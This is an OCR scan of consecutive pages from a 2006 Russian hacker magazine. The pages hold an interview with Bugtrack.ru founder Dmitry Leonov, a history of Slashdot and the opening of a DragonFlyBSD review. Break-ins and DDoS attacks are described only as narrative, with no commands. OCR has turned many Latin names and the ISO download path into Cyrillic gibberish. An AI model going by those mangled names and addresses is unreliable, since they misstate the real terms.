включил в нее интервью с основателем Хак- 
зоны и Багтрака и бессменным модерато- 
ром форума Дмитрием Леоновым. 



И. А.: Дима, я слышал, что на старой Хак- 
зоне все самое интересное происходило 
внутри закрытого клуба. Расскажи о нем 
поподробнее. Сложные были условия для 
попадания в ряды «избранных»? 

Д. Л.: В какой-то момент народу захотелось 
отсева откровенно бездумной публики со 
стандартными примитивными вопросами, 
после чего и возникла идея закрытого и по- 
лузакрытого форума. Сначала я сочинил уме- 
ренно сложную задачку — грубо говоря, для 
получения постоянного доступа нужно было 
найти способ оставить сообщение в геасі-опіу 
разделе. Дальше уже с помощью первых про- 
шедших стали появляться другие задачи, тест 
ит.п. Боюсь только, что общение на закрытом 
форуме сводилось в основном к обсуждению 
новых задач для претендентов. Хотя знающих 
людей было много. 

И. А.: Про сайт Хакзоны я в рунете нашел 
кое-какую информацию, а про печатный 
журнал практически ничего. Каким он был? 

Д. Л.: Номеров журнала было, как минимум, 
четыре. «Компьюлог» запустил тогда не- 
сколько компьютерных изданий, нацеленных 
на разные аудитории. Наполнение шло пре- 
имущественно из присьшаемых статей, что и 
стало основной проблемой — большинство 
авторов хотело их опубликования сразу в вебе, 
в итоге журнал наполовину, если не больше, 
состоял из того, что уже было доступно в он- 
лайне . Первый год он еще как-то протянул, ну 
а дальше его добили кризис 98 -го года, неоп- 
равданно завышенная цена, распространение 
только по подписке, причем проваленной, 
сдвоенные номера и т.п. 

И. А.: Как возникла идея Багтрака, почему 
ты выбрал такое название и как сайт при- 
шел к тому виду, какой он имеет сейчас? 

Д . Л. : Вообще, Ъи^Игад — название одного из 
самых популярных 8есигігу мейл-листов, и на 
момент запуска сайта это имя представлялось 
нарицательным. Оно не совсем соответствует 
содержанию, поскольку, собственно Игад’а в 
чистом виде тут не так уж много, но мне нра- 
вится. Задумывался сайт как Хакзона, очи- 
щенная от старого мусора и лишенная таких 
недостатков, как зависимость от чужих денег, 
необходимость постоянно рассказывать, что 



на самом деле мы белые и пушистые. При 
создании Ьи§Цгад.т я оглядывался только на 
свой опыт и свое представление о том, каким 
должен быть информационный сайт по бе- 
зопасности, поддерживаемый командой ми- 
нимальных размеров. Сначала был запущен 
форум, вокруг которого сформировалось и 
окрепло новое комьюнити, параллельно шла 
доводка движка, и через несколько месяцев я 
приступил к наполнению контента . Из людей , 
приложивших руку к сайту, в первую очередь 
следует упомянуть моего старого друга Ва- 
дима Деркача, который сделал дизайн, Влада 
Мяснянкина, вытянувшего на себе ЯЗИ тог- 
да, когда у меня физически не оставалось на 
нее времени, и Павла Протасова, продолжа- 
ющего вести правовой раздел. 

И. А.: Насколько активен форум Багтрака? 
Проводятся ли реальные встречи постоян- 
ных участников? 

Д . Л . : На Багтраке обычная активность — не- 
сколько десятков сообщений в день. Моде- 
рирование форума полуавтономное — по- 
сетители могут самостоятельно оценивать 
кандидатов на вылет или перенос на другую 
доску, голос старожилов при этом имеет 
больший вес. Схема обкатывалась в течение 
нескольких лет и доказала свою эффектив- 
ность. Мне приходится вмешиваться лишь 
в особо клинических случаях. Насчет реала 
— пока «централизованных» встреч не было, 
но как раз сейчас идет активное обсуждение 
этой темы. 

И. А. : Откуда вы черпаете новости для Я$№ 

Д. Л.: При составлении новостей идет Г88- 
лент зарубежных ресурсов, соответственно, 
часто удается оказаться первыми. Русские 
ньюс-сайты я просматриваю для контроля, не 
пропустил ли чего. Такой подход гораздо ин- 
тереснее бездумной перепечатки материалов, 
да еще из русскоязычных ресурсов общеком- 
пьютерной тематики. Конечно, если новость 
добавляют посетители, то я могу занести ее в 
выпуск, но, честно говоря, считаю такой под- 
ход не очень профессиональным. 

И. А.: Ломали ли Ьи^-ігад.ги ? Или хотя бы 
попытки ДДОСа были? 

Д. Л.: Удачная попытка была одна, в ночь на 
12 марта 2000 года. Моя совесть тут чиста, 



ломали очень серьезно, начиная с локальной 
сети хостера. По его словам, атака на сеть 
продолжалась по крайней мере три недели, в 
течение которых добраться до сервера с веба- 
ми так и не удалось, хотя точно известно, что 
целью была именно Хакзона. Схема проник- 
новения включала захват рута на вспомога- 
тельном сервере, установку снифера и полу- 
чение в итоге доступа к серверу с вебами. На 
основные файлы были выставлены атрибуты, 
делающие невозможным их восстановление 
иначе как в 8Іп§1е шег тобе, так что поломан- 
ная страница провисела всю ночь. Стандар- 
тные сканирования идут постоянно, так что 
это можно наблюдать в логах практически 
любого сайта, а, с учетом отсутствия на сай- 
те стандартных и популярных скриптов, это 
меня не слишком волнует. 

И. А. : Много ли времени отнимает Багтрак, 
и не устаешь ли ты от этого проекта? 

Д . Л . : Сейчас, при написанных и отлаженных 
движках, не так уж много — в среднем час- 
два в день, с учетом отслеживания событий, 
подготовки новостей, приглядывания за фо- 
румом и т.п. Разумеется, у любого авторско- 
го проекта бывают периоды кризисов, когда 
интерес падает. У меня такие кризисы тоже 
были, но проходили сами собой. 

И. А.: Какие события из жизни Хакзоны 
и Багтрака тебе запомнились особенно? 

Д. Л.: Запомнилось ощущение прорыва, 
когда после одной из первых телепередач о 
хакерах и Хакзоне сайт рывком удвоил посе- 
щаемость, перевалив сразу за тысячу хитов. 
Запомнился жуткий ажиотаж вокруг невин- 
ного опроса насчет информационной вой- 
ны против НАТО, который я повесил сразу 
после югославских событий. Запомнился, 
конечно, неприятный осадок последних ме- 
сяцев умирания сайта. Мой уход продлился 
года на полтора больше, чем нужно. Слиш- 
ком много сил было вложено в сайт, так что я 
не воспринимал работу над ним как простой 
наемный труд. Но потом как-то надоело, тут 
и фактическое кидание победителей конкур- 
сов сыграло роль, и постоянные проблемы с 
журналом. Конечно, запомнились люди — 
куча хороших знакомых, с которыми иначе 
бы просто не встретился. 
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Сцена / 02 



$І_А$НЮОТ 



Последнее пристанище техногиков 



Ежедневно сотни тысяч посетителей заходят на этот 
сайт, чтобы узнать о последних новостях в мире высо- 
ких технологий, чтобы высказать свое мнение о проис- 
ходящих событиях в среде крупных корпораций и от- 
крыть для себя что-то новое и интересное. Посетители 



этого сайта — в большинстве своем техноэлита, люди, 
мыслящие креативно, чьи идеи устремлены в обозримое 
будущее. Их принято называть гиками, а место, где они 
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Основатель 
ЗЫЬсІои’а — 

Роб Малда ака 
СшсІгТасо — 

родился в 1973 году 
в городе Холлэнд, 
штат Мичиган. 



Родители отпра- 
вили его учиться 
в частную школу 
с религиозным 
уклоном, где Роб 
впервые увлекся 
компьютерами и 
стал проводить 
значительную часть 
своего времени, 
изучая содержимое 
местных ВВ8. 




1992 



В старших классах Роб даже пытался 
зарабатывать деньги написанием ша- 
роварных программ на ТигЬоРаьсаРе, 
написал онлайновую В В 8 -игру и тулзу 
для создания музыкальных композиций. 
Но какого-либо ощущаемого дохода 
это не приносило, поэтому приходилось 
работать в супермаркете, расставляя 
товары на полках. Поступив в колледж, 
Малда, конечно лее, избрал факультет 
компьютерных наук и принялся усердно 
впитывать в себя знания. 



Во время учебы парень устроился на 
работу в фирму Воппеііу на долж- 
ность компьютерного техника и зани- 
мался там установкой ПО и железа. 
Примерно в это время он знакомится 
с Ілпих, которая сразу пришлась Робу 
по душе возможностью автоматизиро- 
вать груды рутинной работы, которую 
приходилось ВЫПОЛНЯТЬ В ѴѴіПСІОЛѴЗ. 
Кроме того, СшсІгТасо в этот период 
активно изучает веб-технологии, начи- 
ная с НТМ Ь и заканчивая программи- 
рованием веб -приложений на основе 
баз данных. Достигнув определенных 
знаний, Роб начинает зарабатывать, 
создавая веб-сайты для риэлторских 
контор, банков и небольших фирм, 
а одновременно с этим приступает к 
разработке собственного сайта, посвя- 
щенного Линуксу и технологиям. Как 
ты уже догадался, этим сайтом станет 
81а8ЬсІо1:. 



1997 



Домен 8Іа8ІісІо1:.ог§ бьт зарегистри- 
рован в сентябре 1997-го. Робу хоте- 
лось, чтобы название было как молено 
более необычным, и сайт, названный 
в честь значка «/.», поначалу даже не 
хотели регистрировать. Но все-таки 
81а8ІісІоі: получил свое рождение и 3 1 
декабря на нем появился первый пост, 
автором которого бьт, конечно лее, 
СшсІгТасо. В сообщении рассказы- 
валось о появлении новой услуги в 
Интернете — возможности заказать 
фотографию, сделанную со спутника 
на околоземной орбите. Большую 
поддержку в развитии сайта Робу ока- 
зал друг Джефф Бэйтс ака Нето8, 
с которым они вместе создали собс- 
твенную небольшую компанию. 





1999 



В 1999 Катц окончательно поки- 
нул НобѴУігесі и стал постоянным 
редактором и автором на Слещдоте. 
Большинство статей, которые он 
пишет, посвящены субкультуре гиков 
и разным мистификациям. 

В конце 1999-го Роб оканчивает, на- 
конец, колледж и начинает вплотную 
заниматься своим детищем, тем более 
что перспективы сайта стали видны 
невооруженным взглядом. 




1998 



Весь следующий год проект стреми- 
тельно развивался: росло количество 
статей, постов, посетителей сайта, 
появились новые авторы. Одним из 
них стал знаменитый американский 
журналист и писатель Джон Катц, 
прославившийся своими статьями в 
онлайновом журнале НоіЛѴігесІ 
и редакторством популярных изданий 
Во8іоп СІоЪе и ѴѴавЬіп^Доп Ро8і. 
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В начале этого года в Интернете впервые 
появляется новое явление, прозванное 
слепщот-эффектом * (читай о нем далее) . 

А 29 -го июня сайт бььт продан компании 
Апсіоѵег.пеі — для дальнейшего развития 
необходимы были крупные капиталовложе- 
ния, которых Роб со своими компаньонами 
не имел. Так Мадда в свои 23 года получил 
кругленькую сумму наличности и возмож- 
ность продолжить работу над сайтом уже 
как сотрудник Апсіоѵег.пеі. 




Вливание капитала в Слешдот не прошло даром — на сайте проис- 
ходит много нововведений: появляется несколько новых разделов, 
вводится знаменитая система метамодерирования. В начале миллени- 
ума на Слешдоте появится юбилейная десятитысячная статья, а к лету 
— миллионный коммент. Происходит постоянное совершенствование 
сайтового движка, вводится так называемая «зоопарковая» система, 
позволяющая относить пользователей к группам друзей или врагов, 
появляется сервис подписки. 




2001 



В 200 1 -м ѴА Ілпих 8у8іет8, владе- 
ющая к тому времени Слешдотом, 
начала испытывать определенные 
финансовые трудности, что отразилось 
на количестве рекламы на сайте (ІТ- 
компании платили большие деньги за 
размещение баннеров на таком сайте, 
как Слешдот) . В то же время была при- 
менена оригинальная по тем временам 
рекламная модель — зарегистрирован- 
ные пользователи могли не видеть всей 
этой рекламы, заплатив $5 за каждую 
тысячу показанных страниц. Количес- 
тво желающих исчислялось десятками 
тысяч, так что модель оказалась весьма 
успешной. Но сегодня это уже история, 
так как к настоящему времени рекламы 
на Слешдоте осталось немного. 



роитюз 

РОР 




404 Еггог 



2004 



В середине августа 2004-го года 
общее количество комментов 
на сайте уже превышало 1 0 
миллионов (на момент напи- 
сания статьи — в районе 1 5 -ти 
миллионов ) . В этом же году, за два 
месяца до президентских выборов 
в США, на Слешдоте появляется 
раздел, посвященный политике. 
Его название можно перевести 
на русский как «Политика для 
кретинов. Ваш голос имеет зна- 
чение» . Понятное дело, что здесь 
будут обсуждаться не обычные 
политические новости, а наиболее 
скандальные, будут подниматься 
вопросы, которые не каждое 
СМИ решится опубликовать. 



Как устроен §Іа$ІісІо( 

Открыв в браузере зіазбсіоі.ога . любой пользователь Ыпих-системы 
сможет почувствовать себя как дома — дизайн сайта явно создавал- 
ся под впечатлением от графических оболочек этих операционных 
систем. Во всяком случае, у меня возникло именно такое впечатле- 
ние. ЗІазНсІоІ сейчас имеет 1 3 основных разделов: «Общий» , «Арріе» , 
«Спроси Слешдот», «Книги», «Разработчики», «Игры», «Железо», 
«Интервью», «ІТ», «І_іпих», «Политика», «Наука» и «УРО». Ноэтолишь 
верхушка айсберга, перейдя по ссылке «Торісз», можно увидеть кучу 
подразделов, которых не менее полутора сотен. 

Начинается все с того, что редактор создает пост в одном из этих 
разделов (материалы обычно присылаются посетителями сайта) — 



будь то интересная новость, идея или статья, там же публикуются 
ссылки на сайты, где можно об этом узнать более подробно. Затем 
эта тема активно обсуждается, и обсуждения нередко переходят 
в бурные споры. Каждый материал на Слешдоте интересен и глу- 
бок по своему содержанию: ведь не зря портал известен как при- 
станище гиков всей планеты! 

Охарактеризовать Слешдот одним словом, сказав, что это форум 
или сайт новостей, не получится. Больше всего проект напоминает 
гигантский веб-блог, но главное его отличие отобычных блогов — уни- 
кальная система модерирования ресурса. Ее особенность в том, что 
модератором может стать любой человек, имеющий действующий 
в течение некоторого времени аккаунт на сайте (нужно, чтобы аккаунт 
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ОДНАЖДЫ РОБА МАЛДУ СПРОСИЛИ В ИНТЕРВЬЮ О ПРИЧИНЕ ФЕНОМЕНАЛЬНОЙ 
ПОПУЛЯРНОСТИ ЗЬАЗЕЮОТ. НА ЧТО РОБ ПРОСТО ОТВЕТИЛ: 

«САЙТ ПОЯВИЛСЯ С НУЖНОЙ КОНЦЕПЦИЕЙ И В НУЖНОЕ ВРЕМЯ». 






входил в число 92,5% старейших аккаунтов в системе), являющийся 
постоянным посетителем и имеющий положительную карму (кар- 
ма — это своеобразный рейтинг на Слешдоте). При модерировании 
сообщения не удаляются, а просто скрываются со страницы, так как 
здесь действует двухуровневый механизм модерирования. 

На первом этапе происходит оценка сообщений на сайте. Чем 
большую оценку получает пост, тем больше у него шансов быть по- 
казанным на индексной странице сайта. При этом у модераторов 
есть ограниченное количество баллов, которые они могут раздать 
за определенный отрезок времени. 

На втором этапе фильтруется некачественное модерирование. 
У «плохих» модераторовухудшается карма, и они могут даже лишить- 
ся своих полномочий, пока вновь не обретут положительный коэф- 
фициент. А улучшается карма от положительно оцененных постов и 
комментариев, размещенных на сайте. 

Редакторы ЗІазИсІоІ'а обладают неограниченными возмож- 
ностями по модерированию ресурса, но они следят лишь за 3% 
контента — остальным занимаются обычные юзеры. Такая поли- 
тика автомодерирования позволяет эффективно отсеивать неин- 
тересные посты и комментарии, оставляя только действительно 
хороший и интересный материал. Таким образом, можно сказать, 
что Слешдот — это автоматически пополняемый материалом и ав- 
томатически редактируемый сайт, автоматизация работ в котором 
возложена на коммьюнити. И в отличие от многих других подобных 
проектов здесь этот механизм прекрасно функционирует. 

Каждый пользователь Слешдота может вести свой журнал, до- 
ступный для прочтения любому другому пользователю. Можно выра- 
жать свое отношение к другим пользователям, причисляя их в кате- 
горию друзей или врагов. В общем, на сайте созданы все условия 
для существования и развития сообщества его посетителей. Лучшим 
определением Слешдота будет не веб-блог, а «онлайн-тусовка». 

Что касается технической стороны, ЗІазІісІоТога работает од- 
новременно на десяти серверах. Пять из них служат для загрузки 
страниц, три — для изображений, еще два задействованы какЗОІ_- 
иІЧРЗ-серверы. Девять из десяти этихсерверовработаютподЭеЬіап 
І_іпііх. Движок, накотором работаетсайт, называется ЗІазИ (ЗІазИбоІ:- 
І_іке Аиіотаіесі ЗіогуІеІІіпд Нотераде). Его первую версию написали 
СтбгТасо и СоѵѵЬоуІЧеаІ, а вторую — программисты из ОЗТС, не- 
которые из них занимаются развитием проекта в настоящее время. 
ЗІазИ написан на РегІ и распространяется по лицензии (ЗШ. 

Интересные посты 

Любые сообщения на ЗІазИсІоі могут вызывать интерес, будь то об- 
суждение новой космической программы ІЧАЗА, дискуссии по поводу 
монополистической политики, проводимой мелкомягкими или даже 
ностальгический треп о былых игровых шедеврах, типа Контры от 
Копаті. Для людей любознательных, интересующихся высокими 
технологиями и нововведениями в нашей жизни, этот ресурс — прос- 
то кладезь информации, а также возможность высказаться самому. 
За время существования сайта было множество интересных случаев 
и шумных дискуссий. Расскажу тебе о некоторых из них. 

В конце 2002-го года «король спама» Алан Ральски дал прессе не- 
сколько интервью о своем бизнесе, сказав, что не видит ничего пло- 
хого в рекламных рассылках по электронной почте. На ЗІазИсІоі'е не 
замедлил появиться пост со ссылками на данное интервью. Конечно 
же, содержание этого интервью вызвало негодование среди слеш- 
дотовцев. И после недолгих обсуждений кто-то предложил наказать 
Ральски весьма оригинальным способом — подписать того на все 
возможные электронные и обычные почтовые рассылки. На форуме 
был выложен е-таіі и физический адрес спамера. . . И тут началось. 
Алану ежедневно приходилось выгребать из своего почтового ящи- 
ка по нескольку килограммов почты. А от электронного адреса ему 
вообще пришлось отказаться. 

Не раз освещался в прессе случай противостояния ЗІазНсІоі с 
Місгозой, произошедшего в 2000-м году. Все началось с того, что на 
Слешдоте опубликовали информацию о расширениях для протоко- 



ла защиты данных КегЬегоз, который первоначально разрабатывал- 
ся как открытый стандарт. Місгозой использовала данный стандарт 
в ѴѴіпсІоѵѵз2000, внеся в него кое-какие изменения, после чего стан- 
дарт утратил свою «открытость». Появившаяся на Слешдоте статья 
подзаголовком «КегЬегоз, РАС и грязные трюки компании Місгозой» 
содержала спецификации тех самых изменений, внесенных в стан- 
дарт майкрософтовцами, вместе с обвинениями в адрес последних 
о попытке монополизировать таким образом рынок серверных сис- 
тем. Майкрософт пригрозила судебными разбирательствами, но 
ЗІазЬбо! не намеревался отступать и в итоге отстоял свою правоту. 
Интересно, что какраз после публикации данной информации Слеш- 
дот подвергся сокрушительной ЭЭоЗ-атаке. 

Пожалуй, самый оригинальный пост на Слешдоте сделал сам со- 
здатель ресурса. 1 4-го февраля 2002-го года, в День Святого Вален- 
тина, Роб создал пост с заголовком «Кэтлин Фент, прочти этоттекст». 
В этом посте Роб предложил своей любимой девушке выйти за него 
замуж. Через 15 минут к этому сообщению появился коммент от са- 
мой Кэтлин с заголовком « Да! » , а в тексте сообщения было написано: 
«Урод. Ты довел меня до слез :). Ура! Я выхожу замуж! :)». 

Последствия популярности 

* Рассказывая про Слешдот, нельзя не упомянуть о явлении, воз- 
никшем с ростом популярности сайта. Это так называемый «слеш- 
дот-эффект». Дело в том, что в постах Слешдота часто приводятся 
ссылки на авторские малопосещаемые ресурсы, и поскольку ауди- 
тория портала огромна, такой большой наплыв посетителей может 
стать смертельным для отлинкованной странички, превращаясь 
фактически в ЭЭоЗ-атаку. Сайты быстро вырубаются и становятся 
недоступными для всего Интернета. В английском языке даже поя- 
вился глагол «Іо Ье зІазЬбоІеб » , который употребляют по отношению 
к веб-пагам, прекративших свою работу в результате резкого наплы- 
вапосетителей.Обычноскачокпосещаемости длится до 15-ти часов, 
пока горячая новость размещена на первой странице Слешдота или 
другого крупного новостного ресурса. Хотя тут есть и положитель- 
ный момент: заслешдотенный сайт нередко находит своих постоян- 
ных посетителей. Сегодня, с развитием всевозможных веб-блогов, 
«слешдот-эффект» в Интернете — частое явление. Его усиленно 
изучают, в том числе социологи, разрабатываются системы, защи- 
щающие сайты от подобного эффекта. 

Наверняка тебе будет интересно узнать, подвергался ли Слешдот 
хакерским атакам и были ли случаи его взлома. Да, были, есть и будут. 
Впервые ЗІазЬбо! взломали в сентябре 1 998-го: взломщик некоторое 
время забавлялся надхакнутой системой, после чего написал письмо 
Робу Малде. В мае 2000-го сайт подвергся продолжительной распре- 
деленной ЭоЗ-атаке, которая продолжалась в течение трех дней. 

В сентябре этого же года Слешдот вновь был взломан. На этот 
раз двумя голландскими хакерами с никами ЫоЬісап и {}. В отли- 
чие от предыдущих взломщиков они не ставили перед собой цели 
хоть как-то навредить сайту. Проникнув через дыру в резервной 
базе данных сайта, они сумели получить административный па- 
роль внутри тестовой части сайта. После чего послали письмо на 
ЗІазНбоІ, где в подробностях описали процедуру взлома и найден- 
ные ими на сайте уязвимости. Когда уязвимости были устранены, 
СтбгТасо запостил на сайте сообщение о произошедшем, не за- 
быв выразить хакерам свою благодарность. 

Однажды Роба Малду спросили в интервью о причине феноменаль- 
ной популярности ЗІазНбоІ. НачтоРобпростоответил:«Сайтпоявился 
с нужной концепцией и в нужное время». Оригинальная концепция 
сайта, позволяющая объединить сообщество гиков и всех тех, кто 
интересуется событиями в мире ІТ, концепция ореп зоигсе, которая 
постоянно совершенствуется, — это и есть причина успеха. Немало- 
важной для тех людей, что составляют сообщество ЗІазИбоІ, является 
политика, которую проводят создатели и владельцы ресурса. Это по- 
литикасвободы, где каждый может выражать свои мысли и где мнение 
сообщества стоит гораздо выше интересов крупных корпораций. 

ВІЫАВѴѴОІЖ’ЗЗЕ 



ХАКЕР 04 /88/ 06 



089 



ЕВГЕНИЙ ЗОБНИН АКА Л М 

/ ЛМШ8Т.ВЦ / 




ІІпіхоісі / 01 

Верхом 
на стрекозе 

Личный досмотр РгадопРІуВЗР 



СУЩЕСТВУЮЩИЕ ОСИ СЕМЕЙСТВА ВЗй УЖЕ ПОРЯД- 
КОМ НАДОЕЛИ. РПЕЕВЗО ПРОДОЛЖАЕТ ПОСТЕПЕННО 
ПРЕВРАЩАТЬСЯ В ЫШХ, ОРЕЫВЗй СТАНОВИТСЯ ПАРА- 
НОИДАЛЬНО СЕКЬЮРНОЙ, ИЕТВЗР ПОРТИРУЕТСЯ НА 
ТОСТЕРЫ И МИКРОВОЛНОВКИ. НИКАКИХ КАРДИНАЛЬ- 
НЫХ ИЗМЕНЕНИЙ :). ХОЧЕТСЯ ЧЕГО-НИБУДЬ ПРИНЦИПИ- 
АЛЬНО НОВОГО, СВЕЖЕГО И С ИЗЮМИНКОЙ (ЛУЧШЕ 
НЕ ОДНОЙ)? ЕСЛИ ТАК, ТО ПРИГОТОВЬСЯ — В ИГРУ 
ВСТУПАЕТ ОРАООМРЬУВЗО. 



Дела минувших дней 

ОгадопРІу появилась как результат разногла- 
сий по поводу дальнейшего развития РгееВЗО. 
Мэтью Диллон, один из активных разработчи- 
ков РгееВЗО, четко представлял себе, в какую 
сторону движется компьютерная индустрия, и 
настаивал на том, что многие компоненты ядра 
нуждаются в коренной модификации и пере- 
работке. Ріо, получив отпор сообщества, Мэт 
набирает команду программистов и 16 июля 
2003 года в рассылке ІгееЬзб-сиггепі сообща- 
ет о том, что впредь к ядру РгееВЗО больше не 
будет иметь никакого отшонения, а все усилия 
направит на разработку собственной ОС под 
амбициозным названием ОгадопРІуВЗО. 

Дословный перевод «Стрекозы» — одно 
из самых совершенных творений природы. 
/2/ Огадоп — «Дракон » , согласно китайской 
мифологии, символизирует мудрость. 

/3 РІу — «Летать» — легкость, необреме- 
ненность функционалом. 

Работа шла полным ходом, дни сменяли 
друг друга, программисты просыпались в 
холодном поту от увиденных во сне беско- 
нечных строк кода. Наконец, всего через 
год после начала работы, 12 июля 2004 
года, мир увидел ОгадопРІуВЗО 1.0. Релиз 
носил чисто технический, так сказать, пре- 
зентационный характер и не претендовал 
на стабильность. Спустя еще некоторое 
время (в этот раз до года не дотянули), 8 ап- 
реля 2005 года, Мэт дарит нам стабильную 
версию намбер ту — 1.2 (в ОгадопРІу приня- 



та схема нумерации релизов в стиле І_іпих — 
1.1 — беѵеі, 1.2 — зіаЫе). В этой версии уже 
в какой-то мере реализованы некоторые 
из задуманных возможностей, но глав- 
ное — ОС теперь по праву может назы- 
ваться стабильной (не менее, чем РгееВЗО 
4.x). Последняя на сегодняшний день ста- 
бильная версия — 1.4 — вышла 7 января 
нынешнего года. В этой версии заявлено об 
официальном переходе на систему портов 
ІЧІеіВЗО — ркдзгс (раньше использовались 
порты РгееВЗО), многочисленных улучше- 
ниях в сетевой подсистеме и ѴРЗ, а также о 
переходе на ОСС-3.4. 

Технические детали 

Интересно в ОгадопРІу то, что внешне ее не 
отличить от РгееВЗО четвертой ветки, но, 
так как были переписаны многие ключевые 
фрагменты ядра (на данный момент только 
часть запланированной работы сделана), 
внутреннее ее устройство совершенно 
иное. Чтобы понять целесообразность сде- 
ланных изменений, нужно узнать, чем же 
все-таки Мэтью Диллону не приглянулись 
существующие технологии, и к чему он, 
собственно, стремится: 

/1 /Доминирование архитектуры х86. 

/2 Многоядерные процессоры как основа 
всех ПК. 

/3 Практика создания дешевых кластеров 
на основе все того же х86. 



С первым пунктом все понятно, мы уже дав- 
но наблюдаем такую обстановку. И можно 
быть уверенными, что в будущем мало что 
изменится (даже Арріе перевела часть сво- 
их маков на х86). Поэтому ОгадопРІу в пер- 
вую очередь нацелена на эту архитектуру (а 
также х86-64 от АМО), из исходников уда- 
лены все упоминания об экзотических плат- 
формах (типа японского РС98). РІесмотря 
на это, Мэт не исключает возможности пор- 
тирования ОС, например на РоѵѵегРС. 
Многоядерные процессоры мы уже можем 
пощупать и опробовать, но на большую рас- 
пространенность таких камней можно рас- 
считывать только через несколько лет. Чтобы 
решить проблему блокировки ядра, которая 
приводит к невозможности одновременного 
выполнения системных вызовов процессами, 
выполняющимися на разных процессорах, в 
ОгадопРІу используется уникальная модель 
Легковесных Нитей Ядра (І_ѴѴКТ). В такой мо- 
дели на каждый процессор выделяется неза- 
висимый планировщик задач, а каждому про- 
цессу ставится в соответствие легковесный 
поток внутри ядра. Для подобной реализации 
пришлось коренным образом переработать 
внутреннюю структуру ядра и ввести меха- 
низм сообщений (такой, который использу- 
ется в микроядерных ОС). Как результат, в 
ОгадопРІу взаимодействие с ядром происхо- 
дит с помощью сообщений, а интерфейс сис- 
темных вызовов — это всего лишь обертка, 
которая может быть заменена, например, на 
объектно-ориентированный интерфейс. 
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СЛОВ О РКС5КС 

Р1с§8гс — это система портов (нечто вроде / шг/роПз из БгееВ8В), изначально предназначенная для 
№і:В8В. Отличается своей элегантностью и высокой портируемостью (может использоваться в Біпих, 
8о1агІ8, БгееВ8В н других ОС), и именно по этой причине используется в Ога^опБІу. Отрицательный мо- 
мент ріс^згс — небольшое количество портированных приложений (6000 против 13000 во БгееВЗО). 



Кластеры — одно из ключевых направлений 
развития ОгадопРІу. Чтобы повысить эффек- 
тивность работы ОС в кластерах, подсистема 
ѴР8 будет полностью переписана и превра- 
щена в некий сервер сообщений. Причем 
такое изменение архитектуры позволит в бу- 
дущем вынести все файловые системы в про- 
странство пользователя, что даже для нас, 
обычных юзеров, есть большой плюс. Также 
будет использоваться совершенно новая 
глобальная инфраструктура кэширования, 
которая, кроме того, что добавит гибкости в 
процесс управления файлами (например, 
позволит одновременно читать и писать один 
и тот же файл нескольким процессами), но и 
даст выигрыш в производительности. 

Для ОгадопРІу планируется создать новую 
систему управления пакетами, обновление 
ОС с ее помощью станет простым и приятным 
занятием. Специально для реализации систе- 
мы пакетного менеджментабыл введен новый 
тип файлов — вариантная символическая 
ссылка, которая в зависимости от некоторого 
условия указывает на разные файлы. 

Для динамического создания файлов уст- 
ройств (/сіеѵ) решено использовать демон 
бѳѵсі, а не загружать ядро лишним кодом, как 
сделано в РгѳѳВЗО. И наконец, по заявлению 
Мэта, уже в ОгадопРІу- 1 .5 появится файловая 
система 2РЗ, портированная из ОрепЗоІагіз. 
Несмотря на кажущуюся сервер-ориенти- 
рованность новой ОС, Мэт не перестает за- 
являть, что его ОС является многоцелевой, 
то есть в функциональном плане не будут 
обижены ни владельцы огромных класте- 
ров, ни пользователи домашних ПК. 

Ловим стрекозу 

Теория — теорией, но и о практике пора 
подумать. В этом разделе повествование 
пойдет об установке и использовании 
«Стрекозы». 

Для начала нам нужно раздобыть дист- 
рибутив самой ОС, и здесь мы сталкива- 
емся с первой проблемой. Дело в том, что 
на данный момент купить где-либо диск с 
ОгадопРІу практически невозможно, толь- 
ко на ѵѵѵѵѵѵ.ііпихсепіег.ги распространяется 
4-дисковая, но старая нестабильная вер- 
сия 1.1, в придачу с ужасной подборкой 
пакетов. Остается один способ — скачать 
ізо-образ с одного из зеркал проекта. Для 
этого вооружаемся ѵѵдеі'ом или другой 
программой и качаем следующий файл: 



611 .тасИсІер.сот/сІИу-1 АОДЧЕЫзо.дг: (~80 
Мб). (На прилагаемом к журналу диске ты 
также можешь найти последнюю версию 
ОгадопРІуВЗО, — прим. ред). Рекомендую 
сразу создать раздел для новой ОС с помо- 
щью Тсіізк или другой подобной программы. 
Получив и нарезав образ диска, вставля- 
ем его в привод, загружаемся с болванки. 
Стандартный загрузчик ОгадопРІу встретит 
нас приветственным меню с изображением 
стрекозы, занявшей место забавного чер- 
тенка РгееВЗО. После нажатия единицы уп- 
равление получит ядро, и перед глазами на- 
чнут мелькать строки ярко-белого цвета (так 
в ОгадопРІу выделяются сообщения ядра). 
По окончании загрузки нам будет предложе- 
но зарегистрироваться в системе в качестве 
гооі'а (вероятно, для того, чтобы использо- 
вать диск для восстановления системы), 
либо в качестве имени ввести іпзШІІег и при- 
ступить к установке системы. От рассказа о 
процессе установки я воздержусь, так как в 
ОгадопРІу вместо РгееВЗО'шного зузіпзіаІІ 
используется универсальный установщик 
ВЗО ІпзіаІІег, написанный во время затеян- 
ной (Зоодіе ореп-зоигсе акции Зиттег оі 
Собе, одна из отличительных черт которого 
— крайне простой процесс установки. 

Еще один интересный момент: в отличие от 
РгееВЗОна дистрибутивном диске ОгадопРІу 
нет установочных пакетов. Сам диск — это 
уже базовая система, и при установке она 
незамысловато копируется на жесткий диск 



командой србир. Ріа первый взгляд все пра- 
вильно: без лишних телодвижений устано- 
вить базовую систему, а затем наращивать 
ее с помощью ркдзгс до приемлемого со- 
стояния, тем более что все дополнительные 
пакеты вместе с «иксами» установятся в /изг/ 
ркд. Ріо почему разработчики ОгадопРІу счи- 
тают, что в этот самый базовый набор софта, 
помимо таких обязательных компонентов, 
как компилятор дсс, должны входить еще и 
зепбтаіі, Ыпб, кегЬегоз и набор игр, для меня 
остается загадкой. 

После окончания установки отправляем 
машину на перезагрузку. Что же мы получи- 
ли, установив на диск ОгадопРІу? Получили 
практически неотличимую от РгееВЗО чет- 
вертой ветки систему с минимальным базо- 
вым набором софта. ОС почти в точности 
повторяет РгееВЗО, поэтому нет резона 
рассказывать о том, как русифицировать 
систему, настраивать ее и добавлять новых 
пользователей. Расскажу лучше о том, что 
же отличает данную ОС от РгееВЗО. 

Первое — система портов. Вместо при- 
вычного /изг/рогіз используется система 
портов ІЧеіВЗО, которую придется получить 
самостоятельно с одного из зеркал ІЧеіВЗО. 

И здесь появляется вторая проблема — не- 
обходимость настройки сетевого соедине- 
ния (как для получения самого дерева пор- 
тов, так и для установки отдельно 
взятого порта). К счастью, получить приветствие 
доступ к Сети можно по аналогии установщика ОгадопРІу 
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ст^^ючередна^ф^^оваясистема? 

